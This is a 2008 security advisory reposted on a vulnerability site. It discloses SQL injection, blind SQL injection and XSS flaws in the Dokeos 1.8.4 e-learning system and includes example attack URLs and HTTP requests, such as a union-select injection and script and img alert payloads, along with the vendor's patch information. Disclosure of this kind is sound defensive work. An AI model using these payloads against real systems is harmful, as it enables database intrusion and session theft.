Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19189
HistoryFeb 20, 2008 - 12:00 a.m.

[DSECRG-08-015] Multiple Security Vulnerabilities in Dokeos 1.8.4

2008-02-2000:00:00
vulners.com
28

Digital Security Research Group [DSecRG] Advisory #DSECRG-08-015

Application: Dokeos E-Learning System
Versions Affected: 1.8.4
Vendor URL: http://dokeos.com
Bugs: Multiple SQL Injections,Multiple Blind SQL Injections,Multiple
XSS, etc.
Exploits: YES
Reported: 25.01.2008
Vendor response: 28.01.2008
Patch released: 12.02.2008
Date of Public Advisory: 19.02.2008
Authors: Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG] (research [at] dsec [dot]
ru)

Description


Dokeos E-Learning System system has multiple security vulnerabilities:

  1. Multiple SQL Injections
  2. Multiple Blind Sql Injections
  3. Multiple Stored XSS
  4. Multiple Linked XSS
  5. Image XSS

Details


  1. Multiple SQL Injections

1.1 Attacker can inject SQL code in module /whoisonline.php vulnerable parametr id
Attacker must have valid user creditionals

Example:
http://[server]/[installdir]/whoisonline.php?id=1'+and+"dsec"="dsecrg"+union+select+user(),version()/*

1.2 Attacker can inject SQL code in module main/mySpace/index.php vulnerable parameter
tracking_list_coaches_column

Example:

http://[server]/[installdir]/main/mySpace/index.php?tracking_list_coaches_direction=ASC&tracking_list_coaches_page_nr=1&tracking_list_coaches_per_page=20&view=admin
&tracking_list_coaches_column=0';

1.3 Attacker can inject SQL code in module /dokeos/main/create_course/add_course.php POST
Parameter tutor_name

Example:

POST /dokeos/main/create_course/add_course.php HTTP/1.0
Cookie: dk_sid=av68g9lus300ts870iqebhneh5
Content-Length: 107
Accept: /
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/dokeos/main/create_course/add_course.php

title=1234&category_code=PROJ&wanted_code=1234&course_language=slovenian&_qf__add_course=&
tutor_name='


  1. Multiple SQL Injections

2.1 Vulnerability found in script index.php in header parameter "Referer"

Example:

GET /dokeos/index.php HTTP/1.0
Cookie: dk_sid=av68g9lus300ts870iqebhneh5
Accept: /
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Referer: '

2.1 Vulnerability found in script /main/admin/class_list.php? in header parameter "X-Fowarded-For"


  1. Stored XSS vulnerability found in /main/auth/inscription.php attacker can inject XSS in POST
    parameter username

  1. Multiple linked XSS

4.1 Linked XSS vulnerability found in dokeos/main/calendar/myagenda.php attacker can inject XSS in
parameter courseCode

Example:

http://[server]/[installdir]/main/calendar/myagenda.php?courseCode="><script>alert('DSecRG
XSS')</script>

4.2 Linked XSS vulnerability found in main/admin/course_category.php attacker can inject XSS in
parameter category

Example:

http://[server]/[installdir]/dokeos/main/admin/course_category.php?category=<script>alert('DSecRG
XSS')</script> HTTP/1.0

4.3 Linked XSS vulnerability found in /dokeos/main/admin/session_list.php attacker can inject XSS
in parameter cmessage

Example:

http://[server]/[installdir]/dokeos/main/admin/session_list.php?action=show_message&message=>%22%27><img/src=javascript:alert('DSecRG
XSS')>


  1. Image XSS vulnerability in page main/auth/profile.php attacker can upload avatar picture with
    XSS code:

Example:

    More info: http://www.dsec.ru/about/articles/web_xss/ &#40;in Russian&#41;

Fix Information


Vendor fix this flaw on 12.02.2008. Patch for version 1.8.4 can be downloaded here:

http://www.dokeos.com/wiki/index.php/Security#Dokeos_1.8.4_SP2_download

About


Digital Security is leading IT security company in Russia, providing information security
consulting, audit and penetration testing services, risk analysis and ISMS-related services and
certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses
on web application and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)

Digital Security Research Group mailto:[email protected]